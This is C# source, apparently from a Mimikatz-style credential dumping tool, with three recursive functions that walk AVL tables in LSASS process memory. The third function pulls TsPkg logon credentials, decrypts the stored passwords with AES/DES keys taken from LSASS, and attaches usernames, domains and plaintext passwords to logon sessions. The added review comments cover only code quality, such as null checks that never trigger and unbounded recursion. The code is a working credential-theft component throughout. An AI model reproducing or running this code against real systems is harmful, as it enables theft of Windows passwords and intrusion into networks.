        /// <summary>
        /// Recursively walks an RTL_AVL_TABLE whose root lives at <paramref name="pElement"/> in the process behind
        /// <paramref name="hLsass"/>, appending one <see cref="KerberosLogonItem"/> for every node whose
        /// OrderedPointer is non-zero. Every Utility.ReadFromLsass call here is presumably a cross-process memory
        /// read; the handle acquisition that makes those reads possible is outside this block.
        /// </summary>
        /// <param name="hLsass">Handle forwarded (by ref, as Utility.ReadFromLsass requires) to every read.</param>
        /// <param name="pElement">Address of the node to read; IntPtr.Zero terminates the recursion.</param>
        /// <param name="klogonlist">Output list; one item is added per node with a non-zero OrderedPointer.</param>
        /// <param name="oshelper">Supplies LogonSessionTypeSize, the byte count read at each OrderedPointer.</param>
        /// <param name="iv">Not used in this block; only forwarded to the recursive calls.</param>
        /// <param name="aeskey">Not used in this block; only forwarded to the recursive calls.</param>
        /// <param name="deskey">Not used in this block; only forwarded to the recursive calls.</param>
        /// <param name="logonlist">Not used in this block; only forwarded to the recursive calls.</param>
        private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, List <KerberosLogonItem> klogonlist, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
        {
            if (pElement == IntPtr.Zero)
            {
                return;
            }

            // Read the node and marshal it into the managed RTL_AVL_TABLE layout.
            byte[]        entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Marshal.SizeOf(typeof(RTL_AVL_TABLE)));
            RTL_AVL_TABLE entry      = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes);

            if (entry.OrderedPointer != IntPtr.Zero)
            {
                // Raw bytes of the structure the node points at. The size is version dependent (taken from
                // oshelper), so the bytes are stored undecoded alongside their source address.
                byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, oshelper.LogonSessionTypeSize);

                KerberosLogonItem item = new KerberosLogonItem();
                item.LogonSessionAddress = entry.OrderedPointer;
                item.LogonSessionBytes   = krbrLogonSessionBytes;
                klogonlist.Add(item);
            }

            // Both child pointers are read back as RTL_AVL_TABLE nodes; right subtree first, then left.
            // NOTE(review): there is no visited-set or depth limit, so an unexpected or corrupted tree
            // (e.g. a child pointing back at an ancestor) would recurse until the stack is exhausted.
            if (entry.BalancedRoot.RightChild != IntPtr.Zero)
            {
                WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist);
            }
            if (entry.BalancedRoot.LeftChild != IntPtr.Zero)
            {
                WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist);
            }
        }
        /// <summary>
        /// Recursively walks an RTL_AVL_TABLE rooted at <paramref name="pElement"/> in the process behind
        /// <paramref name="hLsass"/>, appending the raw bytes found at each non-zero OrderedPointer to
        /// <paramref name="klogonlist"/>. Sizes are widened to ulong with Convert.ToUInt64 because this
        /// overload of Utility.ReadFromLsass takes the byte count as an unsigned 64-bit value.
        /// </summary>
        /// <param name="hLsass">Handle forwarded (by ref) to every Utility.ReadFromLsass call.</param>
        /// <param name="pElement">Address of the node to read.</param>
        /// <param name="klogonlist">Output list of undecoded logon-session byte arrays.</param>
        /// <param name="oshelper">Supplies LogonSessionTypeSize, the byte count read at each OrderedPointer.</param>
        /// <param name="iv">Not used in this block; only forwarded to the recursive calls.</param>
        /// <param name="aeskey">Not used in this block; only forwarded to the recursive calls.</param>
        /// <param name="deskey">Not used in this block; only forwarded to the recursive calls.</param>
        /// <param name="logonlist">Not used in this block; only forwarded to the recursive calls.</param>
        private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, List <byte[]> klogonlist, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
        {
            // NOTE(review): IntPtr is a value type, so `pElement == null` is always false and this guard never
            // returns (the compiler warns about it). Comparing against IntPtr.Zero is what would make it effective;
            // as written, a zero root address is passed straight to Utility.ReadFromLsass below.
            if (pElement == null)
            {
                return;
            }

            // Read the node and marshal it into the managed RTL_AVL_TABLE layout.
            byte[]        entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE))));
            RTL_AVL_TABLE entry      = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes);

            if (entry.OrderedPointer != IntPtr.Zero)
            {
                // Version-dependent number of bytes at the pointed-to structure; stored undecoded.
                byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(oshelper.LogonSessionTypeSize));

                klogonlist.Add(krbrLogonSessionBytes);
            }

            // Both child pointers are read back as RTL_AVL_TABLE nodes; right subtree first, then left.
            // No cycle guard or depth limit: recursion depth is bounded only by the tree actually read.
            if (entry.BalancedRoot.RightChild != IntPtr.Zero)
            {
                WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist);
            }
            if (entry.BalancedRoot.LeftChild != IntPtr.Zero)
            {
                WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, klogonlist, oshelper, iv, aeskey, deskey, logonlist);
            }
        }
        /// <summary>
        /// Recursively walks an RTL_AVL_TABLE rooted at <paramref name="pElement"/> and, for every node with a
        /// non-zero OrderedPointer, reads a TSCred entry, follows its credential pointer to a
        /// KIWI_TS_PRIMARY_CREDENTIAL, decrypts the password field with <paramref name="iv"/>,
        /// <paramref name="aeskey"/> and <paramref name="deskey"/>, and records the result as a
        /// Credential.Tspkg on the <see cref="Logon"/> in <paramref name="logonlist"/> whose LUID matches.
        /// All memory reads go through Utility.ReadFromLsass / Utility.ExtractUnicodeStringString against the
        /// process behind <paramref name="hLsass"/>.
        /// </summary>
        /// <param name="hLsass">Handle used for every read; passed by ref to ReadFromLsass, by value to ExtractUnicodeStringString.</param>
        /// <param name="pElement">Address of the node to read.</param>
        /// <param name="oshelper">Supplies TSCredType and the field offsets (TSCredLocallyUniqueIdentifierOffset, TSCredOffset) for the running OS version.</param>
        /// <param name="iv">Forwarded to BCrypt.DecryptCredentials.</param>
        /// <param name="aeskey">Forwarded to BCrypt.DecryptCredentials.</param>
        /// <param name="deskey">Forwarded to BCrypt.DecryptCredentials.</param>
        /// <param name="logonlist">Mutated in place: existing entries get their Tspkg set, new entries are appended.</param>
        private static void WalkAVLTables(ref IntPtr hLsass, IntPtr pElement, OSVersionHelper oshelper, byte[] iv, byte[] aeskey, byte[] deskey, List <Logon> logonlist)
        {
            // NOTE(review): IntPtr is a value type, so this comparison is always false and the guard never
            // returns; comparing against IntPtr.Zero would make it effective.
            if (pElement == null)
            {
                return;
            }

            // Read the node and marshal it into the managed RTL_AVL_TABLE layout.
            byte[]        entryBytes = Utility.ReadFromLsass(ref hLsass, pElement, Convert.ToUInt64(Marshal.SizeOf(typeof(RTL_AVL_TABLE))));
            RTL_AVL_TABLE entry      = Utility.ReadStruct <RTL_AVL_TABLE>(entryBytes);

            if (entry.OrderedPointer != IntPtr.Zero)
            {
                // The pointed-to structure is sized from oshelper.TSCredType rather than a fixed managed type,
                // so only the two offsets below are interpreted; the rest of the bytes are opaque here.
                byte[] krbrLogonSessionBytes = Utility.ReadFromLsass(ref hLsass, entry.OrderedPointer, Convert.ToUInt64(Marshal.SizeOf(oshelper.TSCredType)));

                // LUID identifying the logon session, and the pointer to its primary credential block.
                // BitConverter.ToInt64 reads an 8-byte pointer, so this path assumes a 64-bit target process.
                LUID luid      = Utility.ReadStruct <LUID>(Utility.GetBytes(krbrLogonSessionBytes, oshelper.TSCredLocallyUniqueIdentifierOffset, Marshal.SizeOf(typeof(LUID))));
                long pCredAddr = BitConverter.ToInt64(krbrLogonSessionBytes, oshelper.TSCredOffset);

                // NOTE(review): pCredAddr is dereferenced without a zero check; a null credential pointer reaches
                // Utility.ReadFromLsass as-is, and how that helper handles address 0 is not visible here.
                byte[] pCredBytes = Utility.ReadFromLsass(ref hLsass, new IntPtr(pCredAddr), Convert.ToUInt64(Marshal.SizeOf(typeof(KIWI_TS_PRIMARY_CREDENTIAL))));
                KIWI_TS_PRIMARY_CREDENTIAL pCred = Utility.ReadStruct <KIWI_TS_PRIMARY_CREDENTIAL>(pCredBytes);

                // "Domaine" is the field name as declared on the marshaled struct.
                UNICODE_STRING usUserName = pCred.credentials.UserName;
                UNICODE_STRING usDomain   = pCred.credentials.Domaine;
                UNICODE_STRING usPassword = pCred.credentials.Password;

                string username = Utility.ExtractUnicodeStringString(hLsass, usUserName);
                string domain   = Utility.ExtractUnicodeStringString(hLsass, usDomain);

                // The whole backing buffer (MaximumLength, not Length) is read, so the ciphertext may carry
                // trailing bytes beyond the logical string.
                byte[] msvPasswordBytes = Utility.ReadFromLsass(ref hLsass, usPassword.Buffer, (ulong)usPassword.MaximumLength);

                byte[] msvDecryptedPasswordBytes = BCrypt.DecryptCredentials(msvPasswordBytes, iv, aeskey, deskey);

                // Decode as little-endian UTF-16 without a BOM; throwOnInvalidBytes = true means malformed
                // output (e.g. a wrong key) raises instead of producing replacement characters, and the
                // plaintext is then shown as hex.
                // NOTE(review): the decoder raises DecoderFallbackException; catching Exception is broader than needed.
                string          passDecrypted = "";
                UnicodeEncoding encoder       = new UnicodeEncoding(false, false, true);
                try
                {
                    passDecrypted = encoder.GetString(msvDecryptedPasswordBytes);
                }
                catch (Exception)
                {
                    passDecrypted = Utility.PrintHexBytes(msvDecryptedPasswordBytes);
                }

                // Entries whose username is empty or a single character are dropped entirely.
                if (!string.IsNullOrEmpty(username) && username.Length > 1)
                {
                    Credential.Tspkg krbrentry = new Credential.Tspkg();

                    // NOTE(review): username is already known to be non-empty from the enclosing check,
                    // so the "******" branch below is unreachable.
                    if (!string.IsNullOrEmpty(username))
                    {
                        krbrentry.UserName = username;
                    }
                    else
                    {
                        krbrentry.UserName = "******";
                    }

                    if (!string.IsNullOrEmpty(domain))
                    {
                        krbrentry.DomainName = domain;
                    }
                    else
                    {
                        krbrentry.DomainName = "[NULL]";
                    }

                    // Check if password is present
                    if (!string.IsNullOrEmpty(passDecrypted))
                    {
                        krbrentry.Password = passDecrypted;
                    }
                    else
                    {
                        krbrentry.Password = "******";
                    }

                    // Attach to the logon session with the same LUID (both halves compared), creating the
                    // session entry if this is the first time the LUID has been seen. An existing Tspkg on a
                    // matched session is overwritten, not merged.
                    Logon currentlogon = logonlist.FirstOrDefault(x => x.LogonId.HighPart == luid.HighPart && x.LogonId.LowPart == luid.LowPart);
                    if (currentlogon == null)
                    {
                        currentlogon          = new Logon(luid);
                        currentlogon.UserName = username;

                        currentlogon.Tspkg = krbrentry;
                        logonlist.Add(currentlogon);
                    }
                    else
                    {
                        currentlogon.Tspkg = krbrentry;
                    }
                }
            }

            // Both child pointers are read back as RTL_AVL_TABLE nodes; right subtree first, then left.
            // No cycle guard or depth limit: recursion depth is bounded only by the tree actually read.
            if (entry.BalancedRoot.RightChild != IntPtr.Zero)
            {
                WalkAVLTables(ref hLsass, entry.BalancedRoot.RightChild, oshelper, iv, aeskey, deskey, logonlist);
            }
            if (entry.BalancedRoot.LeftChild != IntPtr.Zero)
            {
                WalkAVLTables(ref hLsass, entry.BalancedRoot.LeftChild, oshelper, iv, aeskey, deskey, logonlist);
            }
        }